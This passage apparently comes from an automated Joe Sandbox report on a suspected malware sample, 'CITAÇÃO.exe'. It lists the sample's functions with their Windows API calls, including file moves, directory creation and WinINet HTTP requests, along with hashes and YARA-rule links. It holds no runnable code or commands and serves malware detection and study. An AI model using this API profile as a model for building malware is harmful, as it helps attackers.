                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                      • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                      Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,0040F545,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,004A90E8,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,?,0040F545), ref: 0041013C
                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                      • String ID:
                                                      • API String ID: 978794511-0
                                                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                      Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                      Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                      Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_memcmp
                                                      • String ID: '$\$h
                                                      • API String ID: 2205784470-1303700344
                                                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                      Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                      • VariantClear.OLEAUT32 ref: 0045EA6D
                                                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                      • __swprintf.LIBCMT ref: 0045EC33
                                                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                      Strings
                                                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                      • String ID: %4d%02d%02d%02d%02d%02d
                                                      • API String ID: 2441338619-1568723262
                                                      • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                      • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                      • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                      • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                      Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                      • String ID: @COM_EVENTOBJ
                                                      • API String ID: 327565842-2228938565
                                                      • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                      • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                      • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                      • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                      Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantClear.OLEAUT32(?), ref: 0047031B
                                                      • VariantClear.OLEAUT32(?), ref: 0047044F
                                                      • VariantInit.OLEAUT32(?), ref: 004704A3
                                                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                      • VariantClear.OLEAUT32(?), ref: 00470516
                                                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                      • String ID: H
                                                      • API String ID: 3613100350-2852464175
                                                      • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                      • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                      • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                      • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                      Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                      • DestroyWindow.USER32(?), ref: 00426F50
                                                      • UnregisterHotKey.USER32(?), ref: 00426F77
                                                      • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 4174999648-3243417748
                                                      • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                      • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                      • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                      • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                      Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 1291720006-3916222277
                                                      • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                      • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                      • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                      • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                      Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                      • IsMenu.USER32(?), ref: 0045FC5F
                                                      • CreatePopupMenu.USER32 ref: 0045FC97
                                                      • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                      • String ID: 0$2
                                                      • API String ID: 93392585-3793063076
                                                      • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                      • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                      • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                      • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                      Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                      • VariantClear.OLEAUT32(?), ref: 00435320
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                      • VariantClear.OLEAUT32(?), ref: 004353B3
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                      • String ID: crts
                                                      • API String ID: 586820018-3724388283
                                                      • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                      • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                      • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                      • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                      Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,0040F545,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,004A90E8,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,?,0040F545), ref: 0041013C
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                      • _wcscat.LIBCMT ref: 0044BCAF
                                                      • _wcslen.LIBCMT ref: 0044BCBB
                                                      • _wcslen.LIBCMT ref: 0044BCD1
                                                      • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 2326526234-1173974218
                                                      • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                      • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                      • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                      • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                      Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                      • _wcslen.LIBCMT ref: 004335F2
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                      • GetLastError.KERNEL32 ref: 0043362B
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                      • _wcsrchr.LIBCMT ref: 00433666
                                                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                      • String ID: \
                                                      • API String ID: 321622961-2967466578
                                                      • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                      • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                      • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                      • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                      Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
